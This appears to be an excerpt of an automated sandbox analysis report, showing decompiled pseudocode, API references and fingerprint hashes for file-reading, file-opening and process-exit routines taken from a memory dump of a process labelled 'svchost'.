                            				if(_t7 != 0 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
                            					TerminateProcess(GetCurrentProcess(), _a4);
                            				}
                            				E00BD01DD(_t14, _a4);
                            				ExitProcess(_a4);
                            			}






                            APIs
                            • GetCurrentProcess.KERNEL32(?,?,00BD012E,?,00BEA6E0,0000000C,00BD0285,?,00000002,00000000), ref: 00BD0179
                            • TerminateProcess.KERNEL32(00000000,?,00BD012E,?,00BEA6E0,0000000C,00BD0285,?,00000002,00000000), ref: 00BD0180
                            • ExitProcess.KERNEL32 ref: 00BD0192
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: Process$CurrentExitTerminate
                            • String ID:
                            • API String ID: 1703294689-0
                            • Opcode ID: 0028a958ab6ba8e6bf7cab1c297951fda38d626cb413f0eaeabacc26406dfd57
                            • Instruction ID: f7df19ccea1d28d888b565b5530267ccda10905c876d93edc68efbf7a8416528
                            • Opcode Fuzzy Hash: 0028a958ab6ba8e6bf7cab1c297951fda38d626cb413f0eaeabacc26406dfd57
                            • Instruction Fuzzy Hash: 4CE04631420188BFCF117F90CD48B497BA9FB00781F000059F808AB222EB75DE82CB90
                            Uniqueness

                            Uniqueness Score: -1.00%


                            C-Code - Quality: 50%
                            			E00BC1560(void* __ecx, void* __edx, void* __ebp, signed int* _a4) {
                            				void* _t14;
                            				signed int _t15;
                            				void* _t18;
                            				signed int _t19;
                            				void* _t20;
                            				signed int _t26;
                            				signed int _t28;
                            				void* _t31;
                            				void* _t32;
                            				signed int* _t33;
                            				void* _t35;
                            				void* _t36;
                            
                            				_t32 = __edx;
                            				_t31 = __ecx;
                            				_t33 = _a4;
                            				if( *_t33 != 0) {
                            					L2:
                            					_t14 = E00BC1120(_t32, _t33);
                            					_t36 = _t35 + 4;
                            					_t48 = _t14 - 1;
                            					if(_t14 < 1) {
                            						E00BC9F16(_t32,  *_t33, 0, 2); // executed
                            						_t14 = E00BCA488(_t32, _t48,  *_t33); // executed
                            						_t36 = _t36 + 0x10;
                            					}
                            					_t15 = E00BC13D0(_t32, _t33, _t14);
                            					if(_t15 == 0xffffffff) {
                            						goto L7;
                            					} else {
                            						_t3 =  &(_t33[9]); // 0x1
                            						_push( *_t3);
                            						_t33[0x101b] = 0;
                            						L00BC7864();
                            						_push(0);
                            						 *0xbec954 = _t15;
                            						_t5 =  &(_t33[7]); // 0xc0335f00
                            						L00BC7864();
                            						_t6 =  &(_t33[1]); // 0x1a74c085
                            						_t18 = E00BC9F16(_t32,  *_t33, _t15 +  *_t6,  *_t5); // executed
                            						_t7 =  &(_t33[8]); // 0xb85fc35b
                            						_push( *_t7);
                            						L00BC7864();
                            						_push(_t18);
                            						_t19 = E00BC9808(_t31);
                            						_t33[2] = _t19;
                            						_t50 = _t19;
                            						if(_t19 != 0) {
                            							_push( *_t33);
                            							_t9 =  &(_t33[8]); // 0xb85fc35b
                            							L00BC7864();
                            							_t10 =  &(_t33[2]); // 0xc085078b, executed
                            							_t20 = E00BC9B2B( *_t10, _t19,  *_t9, 1); // executed
                            							__eflags = _t20 - 1;
                            							if(__eflags >= 0) {
                            								_t11 =  &(_t33[8]); // 0xb85fc35b
                            								_push( *_t11);
                            								L00BC7864();
                            								_t12 =  &(_t33[2]); // 0xc085078b
                            								_t33[3] = _t20 +  *_t12;
                            								__eflags = E00BC9934( *_t33);
                            								if(__eflags == 0) {
                            									E00BC1200(_t33);
                            									__eflags = 0;
                            									return 0;
                            								} else {
                            									_push("Error on file\n.");
                            									_t26 = E00BC1910(__eflags) | 0xffffffff;
                            									__eflags = _t26;
                            									return _t26;
                            								}
                            							} else {
                            								_push("Could not read from file.");
                            								_push("fread");
                            								_t28 = E00BC17B0(__eflags) | 0xffffffff;
                            								__eflags = _t28;
                            								return _t28;
                            							}
                            						} else {
                            							_push("Could not allocate buffer for TOC.");
                            							_push("malloc");
                            							_t15 = E00BC17B0(_t50);
                            							goto L7;
                            						}
                            					}
                            				} else {
                            					_t2 =  &(_t33[0x1a]); // 0xbc176c
                            					_t15 = E00BC28C0(_t2, "rb");
                            					_t35 = _t35 + 8;
                            					 *_t33 = _t15;
                            					if(_t15 == 0) {
                            						L7:
                            						return _t15 | 0xffffffff;
                            					} else {
                            						goto L2;
                            					}
                            				}
                            			}
















                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: htonl$__fread_nolock
                            • String ID: Could not allocate buffer for TOC.$Could not read from file.$Error on file.$fread$malloc
                            • API String ID: 3757756281-2332847760
                            • Opcode ID: 25ed3d59da06afe63bf290c617b581642314ce4626c1c0ffdbd9048188214c1a
                            • Instruction ID: eb39f4b92f98aa1f145c8edec88a18544ea6feaf076d5932ffa5975d83457124
                            • Opcode Fuzzy Hash: 25ed3d59da06afe63bf290c617b581642314ce4626c1c0ffdbd9048188214c1a
                            • Instruction Fuzzy Hash: 5C21E9B5850700ABEA207B39AC07F5A76E4AF11354F140EECF599A02E3FB72E5508A56
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 77%
                            			E00BD2128(signed int _a4, void* _a8, unsigned int _a12) {
                            				signed int _v5;
                            				char _v6;
                            				void* _v12;
                            				unsigned int _v16;
                            				signed int _v20;
                            				signed int _v24;
                            				signed int _v28;
                            				void* _v32;
                            				long _v36;
                            				void* _v40;
                            				long _v44;
                            				signed int* _t143;
                            				signed int _t145;
                            				intOrPtr _t149;
                            				signed int _t153;
                            				signed int _t155;
                            				signed char _t157;
                            				unsigned int _t158;
                            				intOrPtr _t162;
                            				void* _t163;
                            				signed int _t164;
                            				signed int _t167;
                            				long _t168;
                            				intOrPtr _t175;
                            				signed int _t176;
                            				intOrPtr _t178;
                            				signed int _t180;
                            				signed int _t184;
                            				char _t191;
                            				char* _t192;
                            				char _t199;
                            				char* _t200;
                            				signed char _t211;
                            				signed int _t213;
                            				long _t215;
                            				signed int _t216;
                            				char _t218;
                            				signed char _t222;
                            				signed int _t223;
                            				unsigned int _t224;
                            				intOrPtr _t225;
                            				unsigned int _t229;
                            				intOrPtr _t231;
                            				signed int _t232;
                            				signed int _t233;
                            				signed int _t234;
                            				signed int _t235;
                            				signed char _t236;
                            				signed int _t237;
                            				signed int _t239;
                            				signed int _t240;
                            				signed int _t241;
                            				signed int _t242;
                            				signed int _t246;
                            				void* _t248;
                            				void* _t249;
                            
                            				_t213 = _a4;
                            				if(_t213 != 0xfffffffe) {
                            					__eflags = _t213;
                            					if(_t213 < 0) {
                            						L58:
                            						_t143 = E00BCC9BB();
                            						 *_t143 =  *_t143 & 0x00000000;
                            						__eflags =  *_t143;
                            						 *((intOrPtr*)(E00BCC9CE())) = 9;
                            						L59:
                            						_t145 = E00BD1788();
                            						goto L60;
                            					}
                            					__eflags = _t213 -  *0xbf6308; // 0x40
                            					if(__eflags >= 0) {
                            						goto L58;
                            					}
                            					_v24 = 1;
                            					_t239 = _t213 >> 6;
                            					_t235 = (_t213 & 0x0000003f) * 0x30;
                            					_v20 = _t239;
                            					_t149 =  *((intOrPtr*)(0xbf6108 + _t239 * 4));
                            					_v28 = _t235;
                            					_t222 =  *((intOrPtr*)(_t235 + _t149 + 0x28));
                            					_v5 = _t222;
                            					__eflags = _t222 & 0x00000001;
                            					if((_t222 & 0x00000001) == 0) {
                            						goto L58;
                            					}
                            					_t223 = _a12;
                            					__eflags = _t223 - 0x7fffffff;
                            					if(_t223 <= 0x7fffffff) {
                            						__eflags = _t223;
                            						if(_t223 == 0) {
                            							L57:
                            							return 0;
                            						}
                            						__eflags = _v5 & 0x00000002;
                            						if((_v5 & 0x00000002) != 0) {
                            							goto L57;
                            						}
                            						__eflags = _a8;
                            						if(_a8 == 0) {
                            							goto L6;
                            						}
                            						_t153 =  *((intOrPtr*)(_t235 + _t149 + 0x29));
                            						_v5 = _t153;
                            						_v32 =  *((intOrPtr*)(_t235 + _t149 + 0x18));
                            						_t246 = 0;
                            						_t155 = _t153 - 1;
                            						__eflags = _t155;
                            						if(_t155 == 0) {
                            							_t236 = _v24;
                            							_t157 =  !_t223;
                            							__eflags = _t236 & _t157;
                            							if((_t236 & _t157) != 0) {
                            								_t158 = 4;
                            								_t224 = _t223 >> 1;
                            								_v16 = _t158;
                            								__eflags = _t224 - _t158;
                            								if(_t224 >= _t158) {
                            									_t158 = _t224;
                            									_v16 = _t224;
                            								}
                            								_t246 = E00BD0A25(_t224, _t158);
                            								E00BD09EB(0);
                            								E00BD09EB(0);
                            								_t249 = _t248 + 0xc;
                            								_v12 = _t246;
                            								__eflags = _t246;
                            								if(_t246 != 0) {
                            									_t162 = E00BD2807(_t213, 0, 0, _v24);
                            									_t225 =  *((intOrPtr*)(0xbf6108 + _t239 * 4));
                            									_t248 = _t249 + 0x10;
                            									_t240 = _v28;
                            									 *((intOrPtr*)(_t240 + _t225 + 0x20)) = _t162;
                            									_t163 = _t246;
                            									 *(_t240 + _t225 + 0x24) = _t236;
                            									_t235 = _t240;
                            									_t223 = _v16;
                            									L21:
                            									_t241 = 0;
                            									_v40 = _t163;
                            									_t215 =  *((intOrPtr*)(0xbf6108 + _v20 * 4));
                            									_v36 = _t215;
                            									__eflags =  *(_t235 + _t215 + 0x28) & 0x00000048;
                            									_t216 = _a4;
                            									if(( *(_t235 + _t215 + 0x28) & 0x00000048) != 0) {
                            										_t218 =  *((intOrPtr*)(_t235 + _v36 + 0x2a));
                            										_v6 = _t218;
                            										__eflags = _t218 - 0xa;
                            										_t216 = _a4;
                            										if(_t218 != 0xa) {
                            											__eflags = _t223;
                            											if(_t223 != 0) {
                            												_t241 = _v24;
                            												 *_t163 = _v6;
                            												_t216 = _a4;
                            												_t232 = _t223 - 1;
                            												__eflags = _v5;
                            												_v12 = _t163 + 1;
                            												_v16 = _t232;
                            												 *((char*)(_t235 +  *((intOrPtr*)(0xbf6108 + _v20 * 4)) + 0x2a)) = 0xa;
                            												if(_v5 != 0) {
                            													_t191 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0xbf6108 + _v20 * 4)) + 0x2b));
                            													_v6 = _t191;
                            													__eflags = _t191 - 0xa;
                            													if(_t191 != 0xa) {
                            														__eflags = _t232;
                            														if(_t232 != 0) {
                            															_t192 = _v12;
                            															_t241 = 2;
                            															 *_t192 = _v6;
                            															_t216 = _a4;
                            															_t233 = _t232 - 1;
                            															_v12 = _t192 + 1;
                            															_v16 = _t233;
                            															 *((char*)(_t235 +  *((intOrPtr*)(0xbf6108 + _v20 * 4)) + 0x2b)) = 0xa;
                            															__eflags = _v5 - _v24;
                            															if(_v5 == _v24) {
                            																_t199 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0xbf6108 + _v20 * 4)) + 0x2c));
                            																_v6 = _t199;
                            																__eflags = _t199 - 0xa;
                            																if(_t199 != 0xa) {
                            																	__eflags = _t233;
                            																	if(_t233 != 0) {
                            																		_t200 = _v12;
                            																		_t241 = 3;
                            																		 *_t200 = _v6;
                            																		_t216 = _a4;
                            																		_t234 = _t233 - 1;
                            																		__eflags = _t234;
                            																		_v12 = _t200 + 1;
                            																		_v16 = _t234;
                            																		 *((char*)(_t235 +  *((intOrPtr*)(0xbf6108 + _v20 * 4)) + 0x2c)) = 0xa;
                            																	}
                            																}
                            															}
                            														}
                            													}
                            												}
                            											}
                            										}
                            									}
                            									_t164 = E00BD8D71(_t216);
                            									__eflags = _t164;
                            									if(_t164 == 0) {
                            										L41:
                            										_v24 = 0;
                            										L42:
                            										_t167 = ReadFile(_v32, _v12, _v16,  &_v36, 0); // executed
                            										__eflags = _t167;
                            										if(_t167 == 0) {
                            											L53:
                            											_t168 = GetLastError();
                            											_t241 = 5;
                            											__eflags = _t168 - _t241;
                            											if(_t168 != _t241) {
                            												__eflags = _t168 - 0x6d;
                            												if(_t168 != 0x6d) {
                            													L37:
                            													E00BCC998(_t168);
                            													goto L38;
                            												}
                            												_t242 = 0;
                            												goto L39;
                            											}
                            											 *((intOrPtr*)(E00BCC9CE())) = 9;
                            											 *(E00BCC9BB()) = _t241;
                            											goto L38;
                            										}
                            										_t229 = _a12;
                            										__eflags = _v36 - _t229;
                            										if(_v36 > _t229) {
                            											goto L53;
                            										}
                            										_t242 = _t241 + _v36;
                            										__eflags = _t242;
                            										L45:
                            										_t237 = _v28;
                            										_t175 =  *((intOrPtr*)(0xbf6108 + _v20 * 4));
                            										__eflags =  *(_t237 + _t175 + 0x28) & 0x00000080;
                            										if(( *(_t237 + _t175 + 0x28) & 0x00000080) != 0) {
                            											__eflags = _v5 - 2;
                            											if(_v5 == 2) {
                            												__eflags = _v24;
                            												_push(_t242 >> 1);
                            												_push(_v40);
                            												_push(_t216);
                            												if(_v24 == 0) {
                            													_t176 = E00BD1C82();
                            												} else {
                            													_t176 = E00BD1F94();
                            												}
                            											} else {
                            												_t230 = _t229 >> 1;
                            												__eflags = _t229 >> 1;
                            												_t176 = E00BD1E42(_t229 >> 1, _t229 >> 1, _t216, _v12, _t242, _a8, _t230);
                            											}
                            											_t242 = _t176;
                            										}
                            										goto L39;
                            									}
                            									_t104 =  &_v28; // 0xa
                            									_t231 =  *_t104;
                            									_t178 =  *((intOrPtr*)(0xbf6108 + _v20 * 4));
                            									__eflags =  *(_t231 + _t178 + 0x28) & 0x00000080;
                            									if(( *(_t231 + _t178 + 0x28) & 0x00000080) == 0) {
                            										goto L41;
                            									}
                            									_t180 = GetConsoleMode(_v32,  &_v44);
                            									__eflags = _t180;
                            									if(_t180 == 0) {
                            										goto L41;
                            									}
                            									__eflags = _v5 - 2;
                            									if(_v5 != 2) {
                            										goto L42;
                            									}
                            									_t184 = ReadConsoleW(_v32, _v12, _v16 >> 1,  &_v36, 0);
                            									__eflags = _t184;
                            									if(_t184 != 0) {
                            										_t229 = _a12;
                            										_t242 = _t241 + _v36 * 2;
                            										goto L45;
                            									}
                            									_t168 = GetLastError();
                            									goto L37;
                            								} else {
                            									 *((intOrPtr*)(E00BCC9CE())) = 0xc;
                            									 *(E00BCC9BB()) = 8;
                            									L38:
                            									_t242 = _t241 | 0xffffffff;
                            									__eflags = _t242;
                            									L39:
                            									E00BD09EB(_t246);
                            									return _t242;
                            								}
                            							}
                            							L15:
                            							 *(E00BCC9BB()) =  *_t206 & _t246;
                            							 *((intOrPtr*)(E00BCC9CE())) = 0x16;
                            							E00BD1788();
                            							goto L38;
                            						}
                            						__eflags = _t155 != 1;
                            						if(_t155 != 1) {
                            							L13:
                            							_t163 = _a8;
                            							_v16 = _t223;
                            							_v12 = _t163;
                            							goto L21;
                            						}
                            						_t211 =  !_t223;
                            						__eflags = _t211 & 0x00000001;
                            						if((_t211 & 0x00000001) == 0) {
                            							goto L15;
                            						}
                            						goto L13;
                            					}
                            					L6:
                            					 *(E00BCC9BB()) =  *_t151 & 0x00000000;
                            					 *((intOrPtr*)(E00BCC9CE())) = 0x16;
                            					goto L59;
                            				} else {
                            					 *(E00BCC9BB()) =  *_t212 & 0x00000000;
                            					_t145 = E00BCC9CE();
                            					 *_t145 = 9;
                            					L60:
                            					return _t145 | 0xffffffff;
                            				}
                            			}

                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-3907804496
                            • Opcode ID: b990f6ba3f0288ffab4017548619e6efd8b07082cddf11a591c666bbd2c08044
                            • Instruction ID: bff4143a95d9996373329706eddad119105cd9acddae45de1fe72ae26014bfa0
                            • Opcode Fuzzy Hash: b990f6ba3f0288ffab4017548619e6efd8b07082cddf11a591c666bbd2c08044
                            • Instruction Fuzzy Hash: DBC1AF74D04289AFDF119FA8C881BADFBF0EF2A310F1441DAE954A7392E7749941CB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 147 bdbd1f-bdbd4f call bdbaf3 150 bdbd6a-bdbd76 call bce783 147->150 151 bdbd51-bdbd5c call bcc9bb 147->151 157 bdbd8f-bdbdd8 call bdba5e 150->157 158 bdbd78-bdbd8d call bcc9bb call bcc9ce 150->158 156 bdbd5e-bdbd65 call bcc9ce 151->156 168 bdc041-bdc047 156->168 166 bdbdda-bdbde3 157->166 167 bdbe45-bdbe4e GetFileType 157->167 158->156 170 bdbe1a-bdbe40 GetLastError call bcc998 166->170 171 bdbde5-bdbde9 166->171 172 bdbe97-bdbe9a 167->172 173 bdbe50-bdbe81 GetLastError call bcc998 CloseHandle 167->173 170->156 171->170 177 bdbdeb-bdbe18 call bdba5e 171->177 175 bdbe9c-bdbea1 172->175 176 bdbea3-bdbea9 172->176 173->156 184 bdbe87-bdbe92 call bcc9ce 173->184 180 bdbead-bdbefb call bce6cc 175->180 176->180 181 bdbeab 176->181 177->167 177->170 190 bdbefd-bdbf09 call bdbc6f 180->190 191 bdbf0b-bdbf2f call bdb811 180->191 181->180 184->156 190->191 198 bdbf33-bdbf3d call bd18f4 190->198 196 bdbf31 191->196 197 bdbf42-bdbf85 191->197 196->198 200 bdbf87-bdbf8b 197->200 201 bdbfa6-bdbfb4 197->201 198->168 200->201 203 bdbf8d-bdbfa1 200->203 204 bdc03f 201->204 205 bdbfba-bdbfbe 201->205 203->201 204->168 205->204 206 bdbfc0-bdbff3 CloseHandle call bdba5e 205->206 209 bdbff5-bdc021 GetLastError call bcc998 call bce895 206->209 210 bdc027-bdc03b 206->210 209->210 210->204
                            C-Code - Quality: 42%
                            			E00BDBD1F(void* __ecx, void* __edx, intOrPtr* _a4, signed int* _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
                            				signed int _v5;
                            				char _v6;
                            				void* _v12;
                            				signed int _v16;
                            				signed int _v20;
                            				char _v24;
                            				intOrPtr _v36;
                            				signed int _v44;
                            				void _v48;
                            				char _v72;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				void* __ebp;
                            				signed int _t114;
                            				void* _t122;
                            				signed int _t123;
                            				signed char _t124;
                            				signed int _t134;
                            				intOrPtr _t164;
                            				intOrPtr _t180;
                            				signed int* _t190;
                            				signed int _t192;
                            				char _t197;
                            				signed int _t203;
                            				signed int _t206;
                            				signed int _t215;
                            				signed int _t217;
                            				signed int _t219;
                            				signed int _t225;
                            				signed int _t227;
                            				signed int _t234;
                            				signed int _t235;
                            				signed int _t237;
                            				signed int _t239;
                            				void* _t240;
                            				signed char _t243;
                            				intOrPtr _t246;
                            				void* _t249;
                            				void* _t253;
                            				void* _t263;
                            				signed int _t264;
                            				signed int _t267;
                            				signed int _t270;
                            				signed int _t271;
                            				void* _t273;
                            				void* _t275;
                            				void* _t276;
                            				void* _t278;
                            				void* _t279;
                            				void* _t281;
                            				void* _t285;
                            
                            				_t240 = __edx;
                            				_t263 = E00BDBAF3(__ecx,  &_v72, _a16, _a20, _a24);
                            				_t192 = 6;
                            				memcpy( &_v48, _t263, _t192 << 2);
                            				_t275 = _t273 + 0x1c;
                            				_t249 = _t263 + _t192 + _t192;
                            				_t264 = _t263 | 0xffffffff;
                            				if(_v36 != _t264) {
                            					_t114 = E00BCE783(_t240, _t249, _t264, __eflags);
                            					_t190 = _a8;
                            					 *_t190 = _t114;
                            					__eflags = _t114 - _t264;
                            					if(_t114 != _t264) {
                            						_v20 = _v20 & 0x00000000;
                            						_v24 = 0xc;
                            						_t276 = _t275 - 0x18;
                            						 *_a4 = 1;
                            						_push(6);
                            						_v16 =  !(_a16 >> 7) & 1;
                            						_push( &_v24);
                            						_push(_a12);
                            						memcpy(_t276,  &_v48, 1 << 2);
                            						_t197 = 0;
                            						_t122 = E00BDBA5E(); // executed
                            						_t253 = _t122;
                            						_t278 = _t276 + 0x2c;
                            						_v12 = _t253;
                            						__eflags = _t253 - 0xffffffff;
                            						if(_t253 != 0xffffffff) {
                            							L11:
                            							_t123 = GetFileType(_t253); // executed
                            							__eflags = _t123;
                            							if(_t123 != 0) {
                            								__eflags = _t123 - 2;
                            								if(_t123 != 2) {
                            									__eflags = _t123 - 3;
                            									_t124 = _v48;
                            									if(_t123 == 3) {
                            										_t124 = _t124 | 0x00000008;
                            										__eflags = _t124;
                            									}
                            								} else {
                            									_t124 = _v48 | 0x00000040;
                            								}
                            								_v5 = _t124;
                            								E00BCE6CC(_t197,  *_t190, _t253);
                            								_t243 = _v5 | 0x00000001;
                            								_v5 = _t243;
                            								_v48 = _t243;
                            								 *( *((intOrPtr*)(0xbf6108 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) = _t243;
                            								_t203 =  *_t190;
                            								_t205 = (_t203 & 0x0000003f) * 0x30;
                            								__eflags = _a16 & 0x00000002;
                            								 *((char*)( *((intOrPtr*)(0xbf6108 + (_t203 >> 6) * 4)) + 0x29 + (_t203 & 0x0000003f) * 0x30)) = 0;
                            								if((_a16 & 0x00000002) == 0) {
                            									L20:
                            									_v6 = 0;
                            									_push( &_v6);
                            									_push(_a16);
                            									_t279 = _t278 - 0x18;
                            									_t206 = 6;
                            									_push( *_t190);
                            									memcpy(_t279,  &_v48, _t206 << 2);
                            									_t134 = E00BDB811(_t190,  &_v48 + _t206 + _t206,  &_v48);
                            									_t281 = _t279 + 0x30;
                            									__eflags = _t134;
                            									if(__eflags == 0) {
                            										 *((char*)( *((intOrPtr*)(0xbf6108 + ( *_t190 >> 6) * 4)) + 0x29 + ( *_t190 & 0x0000003f) * 0x30)) = _v6;
                            										 *( *((intOrPtr*)(0xbf6108 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0xbf6108 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) ^ (_a16 >> 0x00000010 ^  *( *((intOrPtr*)(0xbf6108 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30)) & 0x00000001;
                            										__eflags = _v5 & 0x00000048;
                            										if((_v5 & 0x00000048) == 0) {
                            											__eflags = _a16 & 0x00000008;
                            											if((_a16 & 0x00000008) != 0) {
                            												_t225 =  *_t190;
                            												_t227 = (_t225 & 0x0000003f) * 0x30;
                            												_t164 =  *((intOrPtr*)(0xbf6108 + (_t225 >> 6) * 4));
                            												_t87 = _t164 + _t227 + 0x28;
                            												 *_t87 =  *(_t164 + _t227 + 0x28) | 0x00000020;
                            												__eflags =  *_t87;
                            											}
                            										}
                            										_t267 = _v44;
                            										__eflags = (_t267 & 0xc0000000) - 0xc0000000;
                            										if((_t267 & 0xc0000000) != 0xc0000000) {
                            											L31:
                            											__eflags = 0;
                            											return 0;
                            										} else {
                            											__eflags = _a16 & 0x00000001;
                            											if((_a16 & 0x00000001) == 0) {
                            												goto L31;
                            											}
                            											CloseHandle(_v12);
                            											_v44 = _t267 & 0x7fffffff;
                            											_t215 = 6;
                            											_push( &_v24);
                            											_push(_a12);
                            											memcpy(_t281 - 0x18,  &_v48, _t215 << 2);
                            											_t246 = E00BDBA5E();
                            											__eflags = _t246 - 0xffffffff;
                            											if(_t246 != 0xffffffff) {
                            												_t217 =  *_t190;
                            												_t219 = (_t217 & 0x0000003f) * 0x30;
                            												__eflags = _t219;
                            												 *((intOrPtr*)( *((intOrPtr*)(0xbf6108 + (_t217 >> 6) * 4)) + _t219 + 0x18)) = _t246;
                            												goto L31;
                            											}
                            											E00BCC998(GetLastError());
                            											 *( *((intOrPtr*)(0xbf6108 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0xbf6108 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
                            											E00BCE895( *_t190);
                            											L10:
                            											goto L2;
                            										}
                            									}
                            									_t270 = _t134;
                            									goto L22;
                            								} else {
                            									_t270 = E00BDBC6F(_t205,  *_t190);
                            									__eflags = _t270;
                            									if(__eflags != 0) {
                            										L22:
                            										E00BD18F4(__eflags,  *_t190);
                            										return _t270;
                            									}
                            									goto L20;
                            								}
                            							}
                            							_t271 = GetLastError();
                            							E00BCC998(_t271);
                            							 *( *((intOrPtr*)(0xbf6108 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0xbf6108 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
                            							CloseHandle(_t253);
                            							__eflags = _t271;
                            							if(_t271 == 0) {
                            								 *((intOrPtr*)(E00BCC9CE())) = 0xd;
                            							}
                            							goto L2;
                            						}
                            						_t234 = _v44;
                            						__eflags = (_t234 & 0xc0000000) - 0xc0000000;
                            						if((_t234 & 0xc0000000) != 0xc0000000) {
                            							L9:
                            							_t235 =  *_t190;
                            							_t237 = (_t235 & 0x0000003f) * 0x30;
                            							_t180 =  *((intOrPtr*)(0xbf6108 + (_t235 >> 6) * 4));
                            							_t33 = _t180 + _t237 + 0x28;
                            							 *_t33 =  *(_t180 + _t237 + 0x28) & 0x000000fe;
                            							__eflags =  *_t33;
                            							E00BCC998(GetLastError());
                            							goto L10;
                            						}
                            						__eflags = _a16 & 0x00000001;
                            						if((_a16 & 0x00000001) == 0) {
                            							goto L9;
                            						}
                            						_t285 = _t278 - 0x18;
                            						_v44 = _t234 & 0x7fffffff;
                            						_t239 = 6;
                            						_push( &_v24);
                            						_push(_a12);
                            						memcpy(_t285,  &_v48, _t239 << 2);
                            						_t197 = 0;
                            						_t253 = E00BDBA5E();
                            						_t278 = _t285 + 0x2c;
                            						_v12 = _t253;
                            						__eflags = _t253 - 0xffffffff;
                            						if(_t253 != 0xffffffff) {
                            							goto L11;
                            						}
                            						goto L9;
                            					} else {
                            						 *(E00BCC9BB()) =  *_t186 & 0x00000000;
                            						 *_t190 = _t264;
                            						 *((intOrPtr*)(E00BCC9CE())) = 0x18;
                            						goto L2;
                            					}
                            				} else {
                            					 *(E00BCC9BB()) =  *_t188 & 0x00000000;
                            					 *_a8 = _t264;
                            					L2:
                            					return  *((intOrPtr*)(E00BCC9CE()));
                            				}
                            			}


                            APIs
                              • Part of subcall function 00BDBA5E: CreateFileW.KERNELBASE(00000000,00000000,?,00BDBDC8,?,?,00000000,?,00BDBDC8,00000000,0000000C), ref: 00BDBA7B
                            • GetLastError.KERNEL32 ref: 00BDBE33
                            • __dosmaperr.LIBCMT ref: 00BDBE3A
                            • GetFileType.KERNELBASE(00000000), ref: 00BDBE46
                            • GetLastError.KERNEL32 ref: 00BDBE50
                            • __dosmaperr.LIBCMT ref: 00BDBE59
                            • CloseHandle.KERNEL32(00000000), ref: 00BDBE79
                            • CloseHandle.KERNEL32(?), ref: 00BDBFC3
                            • GetLastError.KERNEL32 ref: 00BDBFF5
                            • __dosmaperr.LIBCMT ref: 00BDBFFC
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                            • String ID: H
                            • API String ID: 4237864984-2852464175
                            • Opcode ID: a5581c4fc5a05038f0aae765913ea1366c143109ed0ddfe926e77de34cf14487
                            • Instruction ID: aa122a0cb5c0f08a7937fc7ee9ad12e62324c386382d1b40c349dc7eee5bdba9
